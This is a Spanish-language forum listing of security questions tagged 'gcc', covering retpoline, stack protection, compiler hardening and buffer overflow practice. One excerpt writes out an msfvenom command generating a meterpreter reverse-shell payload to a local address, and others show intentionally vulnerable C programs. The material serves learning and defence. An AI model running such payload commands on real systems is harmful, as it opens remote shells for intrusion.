Preguntas con etiqueta 'gcc'

0
respuestas

Compilando con banderas retpoline GCC

A partir de la versión 8 (posterior a la versión 7.3), GCC ha agregado el soporte de retpoline [ 0] . Aunque entiendo que está destinado a [citación necesaria] para su uso en parches del kernel para Spectre (es decir, [1] [2] ), eso no imp...
hecha 21.05.2018 - 04:40
2
respuestas

No se pueden entender los cambios de $ EIP con desbordamiento de búfer

Estoy aprendiendo desbordamiento de búfer, por lo que la pregunta puede parecer tonta, pero aquí está. Comencé con este programa de buggy muy simple int main(int argc, char *argv[]) { char buf[128]; printf("You entered value %s\n", argv[1]...
hecha 30.05.2018 - 19:45
0
respuestas

Comportamiento del epílogo de funciones desde GCC 4.9.0

Usaré el siguiente código C para explicar mi pregunta: #include <stdio.h> int main(void) { printf("foo\n"); return 0; } Antes de GCC 4.9.0, desmontarlo produce: .LC0: .string "foo" main: push ebp mov...
hecha 10.03.2018 - 06:43
4
respuestas

¿Cómo puedo fortalecer los compiladores (como lo sugiere Lynis)?

Este artículo sugiere restringir los compiladores a la raíz, pero no dice cómo, y no pude encontrar nada. Útil buscando en la web. ii g++ 4:5.3.1-1ubuntu1 i386 GNU C++ compiler ii g...
hecha 03.08.2016 - 13:12
1
respuesta

Problema de compilación de la vulnerabilidad [cerrado]

Estoy tratando de compilar el siguiente exploit: enlace Pero recibe el siguiente error: local.c:12:22: fatal error: asm/page.h: No such file or directory compilation terminated.     
hecha 03.11.2013 - 14:42
1
respuesta

el estado de ASLR, PIE, SSP en Debian en 2018?

Por lo que recuerdo, la mayoría de los paquetes de Debian Wheezy no se compilaron con esos indicadores de seguridad útiles (ASLR, PIE, SSP y más). ¿Mejoró la situación con Debian Squeeze o el próximo Debian Buster? En comparación, Ubuntu y...
hecha 10.08.2018 - 13:04
1
respuesta

Fallo de segmentación en shellcode

He generado un código de shell con msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7878 -f c -o shell.c Cuando compilo mi shell.c con gcc (versión 6.3.0-16) con estas opciones: # gcc -o shell shell.c # gcc...
hecha 12.05.2017 - 01:28
1
respuesta

Problemas con el desbordamiento del búfer de prueba

Estoy experimentando en mi computadora, así que escribí un programa vulnerable en C para probar los desbordamientos de búfer en: #include <stdio.h> #include <string.h> #include <stdlib.h> int check_password(char *password){...
hecha 07.12.2016 - 05:38
0
respuestas

Shellcode no se ejecuta correctamente

Logré que Shell codificara el código de shell al construir mi ejecutable sin medidas de seguridad. Sin embargo, no parece que se ejecute. Aquí está la fuente de C de mi programa vulnerable: #include <stdio.h> #include <string.h&...
hecha 08.12.2016 - 04:49
0
respuestas

¿Por qué -fstack-protector optimiza si una función no asigna una matriz de 8 o más bytes?

De acuerdo con el documento de opciones de instrumentación de gcc , el -fstack-protector solo protege contra "funciones que llaman alloca, y funciona con buffers de más de 8 bytes". ¿En qué se diferencian los buffers de más de 8 bytes de los...
hecha 15.09.2016 - 05:53